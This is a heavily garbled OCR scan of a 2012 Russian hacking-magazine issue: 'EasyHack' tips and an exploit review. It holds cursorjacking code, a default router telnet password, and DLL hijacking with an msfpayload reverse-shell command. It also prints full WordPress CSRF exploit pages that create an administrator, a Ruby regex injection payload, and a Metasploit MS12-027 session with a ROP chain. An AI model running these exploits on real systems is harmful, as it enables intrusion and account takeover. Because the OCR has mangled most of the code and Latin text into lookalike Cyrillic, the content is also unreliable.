курсора в браузере. То есть пользователь будет видеть курсор 
мыши (и, соответственно, управлять им) в одном месте, а на деле 
он будет находиться в другом. Далее, расположив правильно 
элементы, мы заставляем пользователя кликнуть куда-нибудь, 
но фактически клик произойдет в другом месте, на необходимом 
нам элементе (например, на кнопочке Ыке'а). 

Возможно, из объяснения еще не очень понятно, «что и как», 
но, если посмотреть на скриншот и практические примеры, все 
встанет на свои места. 

Сам способ можно разбить на два вида: с использованием 
^аѵа5сгір^ и без него. 



Начнем со второго, так как он более краткий и понятный. 

<5І:ѵ1е 1:ѵре="1:ех1:/с55"> 

#сиг50гдаскіп§ { 

сигБог : игі ( "роіп1;ег2ѵІ5ІЫе . рп§" ) ^ сІе-Раи11:; 

} 



#сиг50гдаскіп§ а { 

сигБог : иг1( "роіп1;ег2ѵІ5ІЫе . рп§" ) ^ сІе-Раи11;; 

} 

</БІ:у1е> 



<сііѵ ісІ="сигБогіаскіп^"> 

<а Ііге-Р="#" опС1іск="а1ег1;( 'Тбгее' ); ">ТІігее</а>&пЬБр; 
&пЬбр;&пЬбр;&пЬбр;&пЬбр;&пЬбр;&пЬбр; <а Ііге-Р="#" 
опС1іск="а1ег1;( ' Роиг ' ) ; ">Роиг</а> 

</сІіѵ> 

Это обрезанный вариант сиг50г)аскіпд'а от Маркуса Нимица 
(Магсиз Міетіеіг). Используя С55, мы подменяем рисунок курсо- 
ра. Причем главное здесь — сама картинка. На первом скриншо- 
те — это красный прямоугольник с курсором в конце. Курсор — 
поддельный, то есть всего лишь рисунок. Фактически курсор (то 
есть точка, указывающая на место для клика) находится в верх- 
нем левом углу красного прямоугольник. Ясное дело, что при 
настоящей атаке красного прямоугольника нет, он «прозрачный». 
В любом случае пользователь видит поддельный курсор и управ- 
ляет им, как будто он настоящий. Но самое главное — когда он 
кликает на элементе поддельным курсором, фактические клики 
происходят на несколько десятков пикселей левее. А там как раз 
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Хакерские секреты простых вещей 



может находиться долгожданный лайк :). То есть на скриншоте 
клик фейковым курсором на линке «Роиг» фактически реализует 
клик на «ТЬгее». 

Далее пример от Котовича (Коіоѵѵісг), теперь уже с ^5. Здесь 
в основе лежат две вещи. Во-первых, возможность полностью 
скрыть настоящий курсор (5'к:у1е="сип50п:попе"). Во-вторых, воз- 
можность задать рисунок (с изображением курсора), который будет 
менять свое положение в зависимости от положения настоящего 
курсора. Подробнее в коментах: 

# Скрываем настоящий курсор для всей страницы: 

<ЬосІѵ 5І:ѵ1е="сиг50г : попе; беі^іті: : 1ѲѲѲрх;"> 



# З адаем р исунок с поддельным к урсором, находящийся 

# "выше всех" на странице 

<іт§ 5І:у1е="ро5І1:іоп : аЬзоІиІіе; і-іпсіех: 1000; " 

ісІ= сиг50г 5гс = "сиг50г .рп^" /> 



# Кнопка, на которую кликает юзер поддельным курсором 
<Ьи1:1;оп ісІ=-Раке 5І:у1е= "-Роп1:-5І2е: 150% ; роз ііііоп :аЬ50Іи1:е; 
1;ор:100рх;1еТі_:_б30рх; ">с1іск _те сііск те</Ьи1;'І:оп> 






^ТРЦЕ 

• РАКЕ 






Настоящий курсор появляется только на внешних элементах. Но понять это — 
непросто 



Сиг50г]аскш§ 

№>11» чІіЬ ГігеГоі апб СЬготе 

Опе Т№Чі 



ТЬгес 

ткиЕ 



РАКЕ 



# Линк^ на который фактически кликнет юзер 

<с1іу 5І:у1е="ро5І1:іоп:аЬ5о1и1:е:1:ор:100рх:1е-Рі::30рх: "> 

<а Ііге-Р="#" опс1іск="а1ег1і(/уои с1іскесІ-те-іп5І:еасІ/Ѵ'> 
і'ш П 0 І: ітрог1:ап1:</а> 

</СІІУ> 



<5сгір1і> 

# Получаем элемент - поддельный курсор 

уаг оМосІе = сіосишепі: ,^е1:Е1епіеп1:ВуІсІ( ' сигзог ' V. 



# Обработчик движений мыши 

уаг опшо уе = ^ип сіііоп (е’) { 

# П олучаем по ложения настоящ его курсора 

уаг пМоуеХ = е.сІіепІіХ. пМоуеУ = е.сІіепІіУ: 

# Меняем положение рисунка поддельного курсора. 

# но со смещением н а 60 0 пикселей впра во 

оМосІе. 5Ііу1 е. 1е-р1: = (пМоуеХ + 600)+"рх"; 

оМосІе. 5І :у1е.1:ор = пМоуеУ + "рх"; 

і 



# Добавляем обработчик для движений мыши 
сІоситеп1:.ЬосІу.асІсІЕуеп1:ІІ5І:епег( 'тоизешоуе' . 
оптоуе. 1:гие): 



Подменяем значок курсора на длинную картинку с поддельным курсором 

</5СГІр1і> 

</Ьос1у> 

Здесь мы создаем изображение с поддельным курсором, 
которое будет двигаться вместе с настоящим курсором только 
со смещением вправо. Таким образом, при клике поддельным 
курсором на кнопку фактический клик произойдет где-то на 600 
пикселей слева. На втором скриншоте такой клик произойдет как 
раз на кнопке Тѵѵіиег'а. 

Несмотря на свою простоту, оба способа достаточно эффек- 
тивны и работоспособны. Из минусов стоит отметить то, что 
работают они только в РР и СЬготе. Но еще хуже, что если настоя- 
щий курсор попадетза границу окна браузера или на элемент 
страницы с другим стилем (стиль сайта жертвы), то автоматиче- 
ски отобразится настоящий курсор и жертва сможет раскусить 
подвох. А потому, несмотря на свою прикольность, данная техника 
в основном рассчитана либо на не самых продвинутых пользова- 
телей (коих на самом деле подавляющее большинство), либо на 
куда-то торопящихся. 

В любом случае советую глянуть на примеры от первоисточни- 
ков: аоо.аІ/МЕУІ'І. аоо.аІ/дАШІ . 



ПОЛУЧИТЬ ДОСТУП к РОУТЕРУ 



ЗАДАЧА 



РЕШЕНИЕ 

За нашу страну можно порадоваться — она обрастает высокими 
технологиями достаточно быстро. Высокоскоростной интернет 
доступен теперь очень многим, что не может не радовать. Личная 
ѴѴі-Рі-точка есть теперь во многих квартирах и очень многих офисах. 
Одним словом — так держать. 

И в качестве развлечения мы можем что-нибудь из этого обору- 
дования повзламывать :). А поможет нам в этом проект Роиіегрѵѵп 
( гоиіегрѵѵп.сопп ). На сайте собраны эксплойты для многих рас- 
пространенных моделей роутеров большинства производителей. 
Кроме этого, можно найти всякие дополнительные штуки типа 
списка дефолтных паролей для сетевого оборудования и опреде- 
лителя вендора по МАС'у. 

Вообще, сам сайт-проект Роиіегрѵѵп очень забавный, так как 
фактически представляет собой эксплойт-пак. Атака происходит 



«как бы» с него самого. Хотя большинство имеющихся эксплой- 
тов и являются реализацией простейших веб-уязвимостей, это 
весьма занятно. :) 

На практике это выглядит так: пентестер заходит на сайт, 
выбирает вендора и уязвимость, далее вводит ІР атакуемого де- 
вайса, и ІаѵаЗсгірІ с сайта редиректит его на девайс по эксплуати- 
руемому ІІРІ'у. 

Хотелось бы отметить, что большинство девайсов настроены по 
дефолту и достаточно хорошо ломаются даже снаружи. 

Ну и до кучи дефолтная учетка от Теіпеі на О-Ыпк ОІР-300, кото- 
рый очень широко распространен в нашей стране: 

Іо^іп: АІрІіапеІіыогкБ 
разБыогсІ: ыг§§19_с_сІ1ыЬг_сІіг300 
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взлом/ ЕА5УНАСК 



ПРОСНИФАТЬ НТТР5-ТРАФИК 



ЗАДАЧА 



РЕШЕНИЕ 

Для начала уточним ситуацию. Предположим, что у нас есть 
какое-то приложение и нам требуется проследить, каким об- 
разом происходит процесс аутентификации. Понятное дело, что 
приложение клиент-серверное, но нам доступна только клиент- 
ская часть. 

Думаю, что самым первым естественным шагом станет запуск 
сниффера, типа ѵѵігезЬагк'а. В нем мы сразу сможем увидеть, 
если данные передаются в незашифрованном виде, например по 
НТТР. Дальше уже дело техники. 

Но в последнее время 551 внедряется повсеместно, и перед 
нами встает не очень простой вопрос о его расшифровке. 

Нет, по сути, это может быть очень просто! Нам всего лишь 
нужно подменить 551-сертификат на свой и подсоединиться 
к своему серверу. Звучит несколько коряво, но на практике нам 
всего лишь требуется указать в приложении в качестве прокси 
тот же самый Вигр или 2АР. И когда приложение будет под- 
ключаться к серверу, наш проксик сгенерит для него поддель- 
ный сертификат и выдаст его за настоящий. Если приложение 
поверит данному сертификату, то оно, по сути, подключится 
к прокси-серверу, а прокси уже к настоящему серверу. В общем, 
классический тап-іп-іЬе-тісІсІІе. 

И здесь, конечно, главное, чтобы приложение поверило 
поддельному сертификату, а для этого чаще всего надо, чтобы 
он был подписан доверенным сертификатом. Как ни странно, 
сделать это очень просто — надо добавить сертификат Вигр'а 
в корневые сертификаты. 

1 . Указываем Вигр как прокси в Іпіегпеі Ехріогег. 

2 . Заходим на Ьир5://доод1е.сопп . 

3 . Появится ошибка сертификата — выбрать «Ѵіеѵѵ». 

4 . Далее «СегІіЛсаІе РаіЬ» — выбираем сертификат 

Рогі5ѵѵіпдег — «Ѵіеѵѵ». 

5 . Кликаем «Іпзіа II» и далее все по дефолту. 

Теперь мы можем обмануть и проснифать почти все приложе- 
ния, потому что большинство ПО тем или иным образом исполь- 
зует системное хранилище сертификатов. Но все-таки не все 
приложения... Например, ОгорЬох начал ругаться. Что же тогда 
делать? Конечно, всегда есть реверс-инжиниринг. И хорошенько 
зарывшись в программу с дебаггером и/или дизассемблером, 
можно выцепить всю информацию и посмотреть все вблизи. Но 
признаюсь, мой опыт реверсинга невелик, да и в итоге получит- 
ся совсем не «еазу» хак, так что предлагаю вариант попроще 
и поуниверсальней. 




Запрос, отправляемый на сервер для аутентификации в Еѵегпоіе 
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Корневой сертификат установлен. Теперь можно все отснифать 

Не так давно Я познакомился с чудесной тулзой — АРІ 
Мопііог ( ѵѵѵѵѵѵ.гоМіаЬ.сопп ). Как ясно из названия, она позволяет 
мониторить все АРІ-вызовы (а их очень-очень много), которые 
используются в том или ином приложении. В каком-то смысле 
она напоминает тулзу РгосМоп от Руссиновича, но кроме всего 
сохраняет и данные и параметры, которые были переданы 
в какую-то функцию. Получается такой более глубокий взгляд 
на действия программы. Кроме этого, есть возможность ставить 
брейкпоинты на функции, редактировать память процесса. За- 
четная тулза получилась. 

Один из главных ее плюсов — простота и быстрота исполь- 
зования. Так, решил я посмотреть через нее процесс аутенти- 
фикации в десктопной версии Еѵегпоіе. Вообще, на сайте есть 
парочка примеров использования тулзы, в том числе просмотр 
НТТР5-трафика для ІЕ и Рігеі'ох. Я действовал по аналогии. 

Сначала я запустил Еѵегпоіе и 32-битную версию АРІ Мопііог 
(так как Еѵегпоіе — 32-битный). В Еѵегпоіе логин и пароль пока 
не вводил. Вообще, основная трудность с АРІ-мониторингом 
в том, чтобы выбрать подходящие функции для мониторинга, 
ведь приложения разные и работать могут по-разному (офици- 
альные примеры с ІЕ и РР это подтверждают). Хотя для людей 
больше шарящих, я думаю, это не проблема :). В любом случае 
решение для меня было очень простым — выбрать в «АРІ ЛКег» 
основные разделы, связанные с сетевым взаимодействием. 

И стоит отметить, что данный метод сработал отлично. Далее 
в «Риппіпд Ргосезз» нашел процесс еѵегпоіе.ехе, кликнул 
правой кнопкой и выбрал «5іагІ Мопііогіпд». Мониторинг на- 
чался, и я ввел некорректные учетные данные в Еѵегпоіе. АРІ 
Мопііог отработал на славу и отразил мне приличный список вы- 
зовов. Я пробежался по нему, просматривая названия функций 
и значения, передаваемые им в окне «НЕХ ЬиІ'І'ег», и очень скоро 
обнаружил искомое — НТТР-запрос на сервер Еѵегпоіе. 

Все оказалось даже проще, чем я предполагал. 

Кстати, в Еѵегпоіе обнаружилась классическая уязвимость: 
при вводе некорректного логина сервер ругался именно на ло- 
гин, а при некорректном пароле — именно на пароль. Хотя в при- 
ложении корректно отображалось «неверный логин или пароль» 
при любой некорректности. В общем, приятная обстановка для 
брутфорса. 
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Хакерские секреты простых вещей 



ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 
С ИСПОЛЬЗОВАНИЕМ осі-нидскінб 



ЗАДАЧА 



РЕШЕНИЕ 

Теперь давай перейдем от веба к чему-то более локальному 
и продолжим узнавать, как повысить локальные привилегии 
в ОС ѴѴіпсІоѵѵз. В прошлом номере мы искали сторонние сервисы, 
работающие в ОС с наивысшими правами, но имеющие некор- 
ректно настроенные права, в которых находятся их ехе-файлы 
и библиотеки. Данный способ пусть не использует каких-то 
крутых эксплойтов, зато работает в полностью пропатченной 
винде. Следующий способ похож и во многом тоже основан 
на некорректности конфигурации системы. Но ладно, не буду 
томить тебя... 

Суть метода заключается в том, чтобы заставить некоторый 
сервис или ПО с нужными нами привилегиями загрузить нашу 
ОН. Техника 011-Ы]'аскіпд использует тот факт, что ѴѴіпсІоѵѵз ищет 
при загрузке приложения ОН по имени и сразу в куче мест. 
Последовательность поиска такова: 

1 . Каталог, из которого загружено приложение. 

2 . Системный каталог. 

3 . Каталог 16-раз рядной версии системы. 

4 . КаталогѴѴіпсІоѵѵз. 

5 . Текущий рабочий каталог. 

6 . Каталоги, перечисленные в переменной среды РАТН. 




Найденный 01Ыіі]аскіпд в одном из распространенных сервисов 



1 . Выставляем «сопІаіп5»-фильтры в РгосМоп: 

• Ргосеззпате — имя_сервиса; 

• РезиК — Мате поИоипб; 

• РаіИ — любая папка из переменной окружения РАТН. 

2 . Запускаем сервис (перед этим остановив его): 
ытіс зегѵісе имя_сервиса саіі 5І;аг1;5егѵісе 



Наша задача — найти место, куда бы мы смогли записать 
свою ОН, и при этом чтобы приложение грузило именно ее. 
Однако ни в каталог с приложением, ни в системные каталоги 
мы писать не можем — недостаточно привилегий. Остается 
только РАТН, обычная переменная окружения, но очень важная, 
так как при ее некорректном содержимом может представлять 
собой большой изъян в обороне ОС. Случается такое, что в РАТН 
указаны директории, в которые у нас есть возможность писать, 
и при этом есть сервисы, которые пытаются искать там свои ОН. 

Итак, что нам необходимо. Во-первых, это РАТН, настроен- 
ный нестандартно. По умолчанию там все ОК, но с возрастанием 
функционала и ПО там могут добавиться новые записи. Это осо- 
бенно свойственно пользовательским хостам (из-за количества 
ПО) и серверным, при установке на них ненативных систем 
(например, какой-нибудь сервер приложений на базе ^АVА). 
Далее, нам необходимо проверить права на эти директории. Нам 
требуется возможность записи или дозаписи. Ну и последнее: 
сервис должен быть уязвим к 011-Ы)аскіпд'у, то есть должен ис- 
кать файлики библиотек в РАТН. 

Для того чтобы найти такие сервисы, нам потребуется РгосМоп 
от Руссиновича. Процесс поиска на самом деле очень простой: 



В итоге все неудачные поиски в РАТН можно считать уяз- 
вимостью сервиса к 011-Ы)аскіпд'у. Кроме того, можно сразу 
запустить несколько процессов. В общем, это быстро. 

Возможно, тебе покажется, что эти три компонента, необ- 
ходимые для повышения привилегий, — нереальное стечение 
обстоятельств и способ неюзабелен. Отнюдь нет. Возвращаясь 
к практике, стоит отметить важную вещь — многие приложе- 
ния подвержены 011-Ы)аскіпд'у и на многих хостах переменная 
окружения РАТН установлена нестандартно. Так что способ 
очень даже реален. 

К его минусам стоит добавить то, что для эксплуатации его требу- 
ется возможность как-то повлиять на сервис и перезагрузить его. Но 
ведь никто и не обещал, что ломать будет легко. 

Ну и напоследок небольшое напоминание о том, как 
в МеІазрІоіКе генерить теіегргеіег в виде библиотеки для экс- 
плуатации 011-Ы)аскіпд: 

ШБ-Ррауіоасі ыіпсІоы5/те1:егрге1;ег/геѵег5е_1;ср 
1НО5Т=192.168.0.1 О > сіііпате.сііі 

Вот и всё. Успешных ресерчев и познаний нового! 



ДОБАВИТЬ ПОДДЕРЖКУ 
АУТЕНТИФИКАЦИИ НА ПРОКСИ 



ЗАДАЧА 



РЕШЕНИЕ 

Частенько бывает, что сидишь ты в корпоративной сети за прокси 
с виндовой (МТІМ) аутентификацией и думаешь: а как заставить 
какое-нить приложение работать через прокси, особенно с аутен- 
тификацией? Ведь очень многие приложения поддерживают прок- 
си только частично, и аутентификация вызываету них проблемы. 

Как пример: мне как-то нужно было поставить модули для РиЬу. 
Поддержка прокси есть, но без возможности аутентификации. 



Погуглив, нашел пару решений: какие-то дополнительные 
модули, где-то в настройках копаться надо и, наконец, аккурат- 
ный костыль, которым я и хочу поделиться. Идея в том, чтобы 
настроить прогу на использование локального прокси, например 
Вигр'а или 2АР оѵѵазр. А в них уже указать настоящий прокси- 
сервер и настроить необходимую аутентификацию. 

А так как Вигр всегда наготове, то костыль этот очень хорош. 



ХАКЕР 07/162/2012 



047 








ВЗЛОМ/ОБЗОР эксплойтов 



Павел Александрович [іѵіпзісІе.ЫодБроТсот] 
Дмитрий Михайлович (115612, дер. Красная звездочка, д. 1) 




Мы шли под грохот от сегфолтов. 
Мы ВЗОО'усмотрели влицо. 
Вперед продвигались отряды 
Серошляпников — смелых бойцов. 



ЭКСПЛОИТОВ 



ВСЯКИЕ ШТУКИ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



р|~| Множественные С5ЯР в ѴѴогсІРге55 



СѴ55Ѵ2 6.0 



ЩШЗ 



(АѴ:М/АС:М/Аи:5/С:Р/І:Р/А:Р) 



ѴѴогсІРгезз — известнейшая СМ5, поэтомумы немогли пропустить 
очередноеуведомление о найденных в ней багах. На этот раз были обна- 
ружены уязвимости типа СгоззБі^е РериезІіРогдегу (на языке Толстого это 
звучит как «подделка межсайтовых запросов»), а втор — уже блиставший 
в нашей рубрике ІѵапоВіпеиі. 



Для реализации его намерений атакующему необходимо, чтобы 
аутентифицированный администратор или пользователь с достаточ- 
ными привилегиями зашел на специально созданную страницу в своем 
браузере. Уязвимости существуют из-за неправильной генерации 
так называемых а пЛ СВР Ртокенов (_\л/рпопсе,_\л/рпопсе_сгеа^е-и5ег, 
_а)ах_попсе,_\л/рпопсе-си5^опп-Ьаскдгоипс1-ир1оас1,_\л/рпопсе-си5^опп- 
ИеасІег-ирІоасІ). Для некоторых типов операций эти токены не закре- 
пляются за номером текущей сессии, но в то же время они являются 
валидными для этих операций в течение 12 часов. Код страницы, на 
которуютребуетсязавлечьпользователя для смены имени поста под 
номером 1, выглядиттак: 



ЕХРЮІТ 



Найденные уязви мости позволяют атакующему совершать вопиющие 
действия: 

• изменятьимена постов; 

• добавлять администраторов/пользователей; 

• удалять администраторов/пользователей; 

• изменятьвидимостькомментариев; 

• удалятькомментарии; 

• изменятьфоновую картинку; 

• изменятьшапкутемы; 

• изменятьимя сайта; 

• изменятьмейл администратора; 

• изменять путь кѴѴогсІРгезз; 

• изменять путьксайту. 



<Іі1;т1><ЬосІу оп1оасІ="даѵа5сгір1;:сІоситеп1:.-Рогт5[0] .5иЬті1:()"> 
<Н2>С5КР Ехріоіі; 1;о сІіап§е ро5І; 1;і1;1е</Н2> 

<-Рогт те1:ІіосІ="РО$Т" пате="-Ро г тѲ" ас1:іоп= 

: //<ыогсІрге55_ір> : 80/ыр-асІтіп/асІтіп-адах. рІір"> 

<іпри1: 1:уре="ІіісІсІеп" пате="ро5І;_1:і1:1е" ѵа1ие="ІіаскесІ1:і1:1е"/> 
<іпри1: 1:уре="ІіісІсІеп" пате="ро5І:_пате" ѵа1ие="ІіаскесІ1;і1;1е"/> 



<іпри1: 1:уре="ІіісІсІеп" 


пате="тт" 


ѵа1ие="03"/> 


<іпри1: 1;уре="ІіісІсІеп" 


пате="зз" 


ѵа1ие="16"/> 


<іпри1: 1:уре="ІіісІсІеп" 


пате="аа" 


ѵа1ие="2012"/> 


<іпри1; 1;ѵре="ІіісІсІеп" 


паше="ІіІі" 


ѵа1ие=""/> 


<іпри1: 1:уре="ІіісІсІеп" 


пате="тп" 


ѵа1ие=""/> 


<іпри1; 1;уре="ІіісІсІеп" 


пате="55" 


ѵа1ие=""/> 



<іпри1: 1:уре="ІіісІсІеп" пате="ро5І;_аи1:Ііог" ѵа1ие="1"/> 
<іпри1: 1:уре="ІіісІсІеп" пате="ро5І:_ра55ыогсГ ѵа1ие=""/> 
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Обзор эксплоитов 



<іпри1: 1;уре="ІіісІсІеп" пате="ро5І:_са1:е§огу%5В%50" ѵа1ие="0"/> 
<іпри1; 1;уре="ІіісІсІеп" пате="ро5І:_са1:е§огу%5В%50" ѵа1ие="1"/> 
<іпри1: 1:уре="ІіісІсІеп" пате="1:ах_іпри1:%5Вро5І;_1;а§%50" ѵа1ие=""/> 
<іпри1: 1;уре="ІіісІсІеп" пате="соттеп1;_5І;а1;и5" ѵа1ие="ореп"/> 

<іпри1: 1:ѵре="ІіісІсІеп" пате="ріп^_5І:а1:и5" ѵа1ие="ореп"/> 

<іпри1: 1;уре="ІіісІсІеп" пате="_5І:а1:и5" ѵа1ие="риЫІ5Іі"/> 

<іпри1: 1;уре="ІіісІсІеп" пате="ро5І:_-Рогта1:" ѵа1ие="0"/> 

<іпри1: 1;уре="ІіісІсІеп" пате="_іп1іпе_есіі1:" 

ѵа1ие="<5пі-р-РесІ_ѵа1ие>"/> 

<іпри1: 1:уре="ІіісІсІеп" пате="ро5І:_ѵіеы" ѵа1ие="1І5І:"/> 

<іпри1: 1:ѵре="ІіісІсІеп" пате="5сгееп" ѵа1ие="есІі1:-ро5І:"/> 

<іпри1: 1:уре="ІіісІсІеп" пате="ас1:іоп" ѵа1ие="іп1іпе-5аѵе"/> 
<іпри1: 1;уре="ІіісІсІеп" пате="ро5І:_1:уре" ѵа1ие="ро5І;"/> 

<іпри1: 1;уре="ІіісІсІеп" пате="ро5І:_І0" ѵа1ие="1"/> 

<іпри1: 1;уре="ІіісІсІеп" пате="есіі1:_сіа1;е" ѵа1ие="1;гие"/> 

<іпри1: 1;уре="ІіісІсІеп" пате="ро5І:_5І:а1:и5" ѵа1ие="а11"/> 
</-Рогт></ЬосІѵ></ІтІ:пі1> 

Вместо <ѵѵогсІрге55_ір> нужно подставить адрес целевого сайта, 
а при необходимости — изменить порт. Добавление администратора 
слогиномасІппіп2и паролем раззѵѵогсі может быть проделано через 
посещениетакой страницы: 

<ІтІ:пі1><ЬосІѵ оп1оасІ="іаѵа5сгір1::сІоситеп1:.-Рогт5[0] .5иЬті1:П"> 

<Н2>С5КР Ехріоіі: 1:о асісі АсІтіпІ5І:га1:ог</Н2> 

<-Рогт те1:ІіосІ="Р05Т" пате="-Рогт0" ас1;іоп= 

"Ітіііір : //<ыогсІрге55_ір> : 80/ыр-асІтіп/и5ег- пеы. рбр" > 

<іпри1; 1;уре="ІіісІсІеп" пате="ас1:іоп" ѵа1ие="сгеа1:еи5ег"/> 
<іпри1: 1;уре="ІіісІсІеп" пате="_ырпопсе_сгеа1;е-и5ег" 

ѵа1ие="<5пі-р-РесІ_ѵа1ие>"/> 

<іпри1: 1:ѵре="ІіісІсІеп" пате="_ыр_ІтІ:1:р_ге-Регег" ѵа1ие= 

"%2РыогсІрге55%2Рыр-асІтіп%2Ри5ег-пеы.рІір"/> 

<іпри1: 1:уре="ІіісІсІеп" пате="и5ег_1о§іп" ѵа1ие="асІтіп2"/> 
<іпри1: 1:уре="ІіісІсІеп" пате="етаі1" ѵа1ие="асІтіп2@асІтіп.сот"/> 
<іпри1: 1:уре="ІіісІсІеп" пате="бг5І:_пате" 

ѵа1ие="асІпііп2(а)асІтіп . сот"/> 

<іпри1: 1:ѵре="ІіісІсІеп" пате="1а5І:_пате" ѵа1ие=""/> 

<іпри1: 1;уре="ІіісІсІеп" пате="иг1" ѵа1ие=""/> 

<іпри1: 1;уре="ІіісІсІеп" пате="ра55І" ѵа1ие="ра55ыогсІ"/> 

<іпри1: 1:уре="ІіісІсІеп" пате="ра552" ѵа1ие="ра55ыогсІ"/> 

<іпри1: 1:уре="ІіісІсІеп" пате="го1е" ѵа1ие="асІтіпІ5І:га1:ог"/> 
<іпри1: 1:уре="ІіісІсІеп" пате="сгеа1:еи5ег" ѵа1ие="АсІсІ+Меѵ\/+и5ег+"/> 
</-Рогт></ЬосІѵ></ІтІ:пі1> 



ТАК6ЕТ5 



ѴѴогсІРгеззЗ.З.І и более ранние. 



зоіитіом 



ОбновитьѴѴогсІРгезз до последней версии. 



2 



Массовые инъекции в проектах на КиЬу 



ются как перевод каретки — \п! Это открывает двери для всевозможных 
инъекций, ТИПИЧНЫЙ при мер эксплуатирования можно описатьтак: 

произвольная строка 

валидная строка для регулярки 

другая произвольная строка 

Получается, что любое использование регулярок с вхождением на- 
званных символов будет вызывать проблемы в безопасности приложе- 
ния. Пример эксплуатации регулярки, которая парситІІРІ, выглядиттак: 

Іаѵа5сгір1::а1ег1:(1’) :ехр1оі1і_сосІеП ;/* 

Іт1:1:р://Ііі.сот 

и 

Таким образом будет сгенерирована страница нетолькосІІРІ, ной с 
нашим произвольным Заѵа5сгір1;-кодом. Самое интересное заключается 
в том, что в действительности это нормальное поведение языка РиЬу, 
о чем написано вдокументации. Однако в любой базе регулярок, по 
которым будеториентироватьсятипичный разработчик, применяются 
символы и $.Авторутверждает, что уязвимости подвержены около90% 
веб-приложений на РиЬу, и при водит примеры багов на таких крупных 
проектах, какдіШиЬ.сопп,5оипсІсІоисІ.сот,ШппЫг.сот и других. Это наво- 
дит на мысль, что большинство разработчиков не слишком озадачивают- 
ся чтением мануалов о специфике программирования на их языке. 



ТАК0ЕТ5 



Любое веб-приложениена РиЬу. 



50ШТІ0М 



Использовать\Аи\г в качестве символов начала и конца строки, как это 
рекомендует делать документация. 



3 



М512-027 Переполнение буфера при 
обработке АсІіѵеХ-компонентов в модуле 



М5С0МСТ1 



СѴ55Ѵ2 



ВА5Е5С0КЕ:9.3 






(НІ6Н)(АѴ:М/АС:М/Аи:М/С:С/І:С/А:С) 



Уязвимостьпри обработкеАсЬѵеХ-компонентов Ыз^Ѵіеѵѵ, ЫзіѴіеѵѵЗ, 
ТгееѴіе\л/иТгееѴіе\л/2вмодуле МЗСОМСТІ.ОСХпозволяетзлоумышлен- 
нику добиться исполнения произвольного кода через веб-сайт, документ 
О^Ьсеили РТР-файл. Активно эксплуатировалась ІТѴѴ в ап реле этого 
года. 



\ шь \ и 

Уязвимостьпроявляется вследствиеошибки вАсбѵеХ-компоненте, 
в рамках эксплойта он встраивается в РТР-документ. 

Создание объектов в РТР производится в соответствии со следующим 
форматом, описанным в спецификации: 



СѴ55Ѵ2 



7.5 






(АѴ: М/АС : 1/Аи : м/с : Р/І : Р/А: Р) 



Наверняка В своей практике многие сталкивались с порой весьма суро- 
выми на видштуками подназванием регулярныевыражения (гедехр), 
или попросту регулярками. ЕгорХомаков поднял однузанятнуютему, 
связанную с реализацией регулярок в языке РиЬу, которая ставит под 
угрозу множество веб-приложений на этом языке. 



ЕХРЮІТ 



Смысл уязви мости заключается в том, что символы (для обозначения 
начала строки) и $ (для обозначения конца строки) в языке РиЬутракту- 



{\оЬдес 1 :\оЬдосх\оЬд 5 е 1 : 5 І 2 е\оЬды 3240 \оЬдЬ 570 {\*\оЬдс 1 а 55 
МуСогтЬгоТ.МСогтЬго!}. . . 

Генерация эксплойта для М50^Ьсе2007: 

ГП5-Р > иве ехр1оі1:/ыіпсІоы5/Гі1е-Рогта1:/т5І2_027_т5Сотс1;1_Ьо-Р 
Ш5-Р ехріоіі: (т5І2_027_т5СотсЫ_Ьо-Р) > 

5 е 1 : раѵіоасі ыіпсіоыз/ехес 

рауіоасі => ыіпсіоыв/ехес 

Ш5-Р ехріоіі (т5І2_027_т5СОШсЫ_Ьо-Р) > 5 е 1 : стсі саіс.ехе 

стсі => саіс.ехе 

Ш5-Р ехріоіі (т5І2_027_гп5Сотсі1_Ьо-Р) > ехріоіі 
[*] Сгеаііп§ ^тБ-Р.сІос-* біе ... 
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ВЗЛОМ/ОБЗОР эксплойтов 



[+] ГП5-Р.СІОС 5І;огесІ а1; /Ііоте/ріко-РагасІ/.т5-Р4/1оса1/т5-Р.сІос 

Ш5-Р ехр1оі'Ь(т5І2_027_т5СотсІ:1_Ьо-Р) > 

Для МБОНісеЗОІОвариантизітіе^азрІоіЛа на моей машине не рабо- 
тает — не подгружается библиотека тздгЗеп.сІІІ, нужная дляуспешной 
работы РОР-цепочки. Поэтому в развлекательных целяхя решил нава- 
ятьсвою РОР-цепочкусблек-джеком, ну и всем остальным :).3а основу 
был взятмодульѵѵѵѵІіЬ.сІІІ, входящий в состав МЗОНісе. Все проверя- 
лось на ѴѴіпХРЗРЗ, сборка 2600. Запускаем ѴѴогсІ 2010,аттачимся кнему 
при помощи ІтппипКуОеЬиддег. Далее используем блага цивилизации 
в видескрипта топа. ру, за который мы вседолжны поблагодарить 
м ногоуважаемого согеІапсОсІЗг (в миру Ре^егѴап ЕескИоиие — Питер 
Ван Экхаут). Вбиваем в командную строку ІттОЬд: 

!топа гор -ш ыыИЬ 



Здесь нам надо будет заменить всю функцию сгеа1;е_гор_сИаіп на 
новую, а также подкорректировать адрес возврата для попадания 
на РОР-цепочку: 



# ыіпыогсі.ехе ѵ14. 0.6024. 1000 (5Р1^ 

[ 'МІСГ0 50-Р1: 0-Р Лсе 2010 5Р1 Еп§1І5Іі оп ілііпсіоыб [ХР 5РЗ / 
7 5Р1] Еп§1І5іі' . 

і 

'Ке1:' => 0Х32596С01. 

# ге1:п # іл/іл/1іЬ.сІ11 <-- заменили адрес здесь 

'Кор' => 1:гие. 

' КорО-р-РзеІ: ' => 120 

} 



Быстро варганим себе чашку кофе и выпиваем зал пом. Всё. Не- 
сколько вариантов РОР-цепочек готово. Выберем последний вариант 
и возрадуемся тому, что для ее составления от нас не потребовалось 
абсолютно никакихтелодвижений. Результат работы скрипта можно 
увидеть в окне Еод л ибо в файле гор_сИаіп5.^х^: 



КОР СІіаіп -Рог Ѵіг1;иа1А11ос() [(ХР/2003 Бегѵег апсі ир)] : 



сіе-р сгеа1:е_гор_сІіаіпП 
гор_^асІее1:5 = 



Ѳх32 31е980. # РОР ЕСХ # КЕТМ [ыыИЬ.сІІ І ] 

0х316сІ1 4ас. # р1:г 1:о &Ѵіг1:иа1А11осП [ІАТ ыыІіЬ.с ІІІ] 

0Х31735СІ1. # ту Е5І.РІЛІОКР РТК Р5:[ЕСХ] 

# КЕТМ [ыыІіЬ.сІІІ] 

0х31ае73б1. # РОР ЕВР # КЕТМ [ыыИЬ.сІІІ] 

0х31 837Ь34. # & ішр езр [ыыІіЬ.сІІІ] 

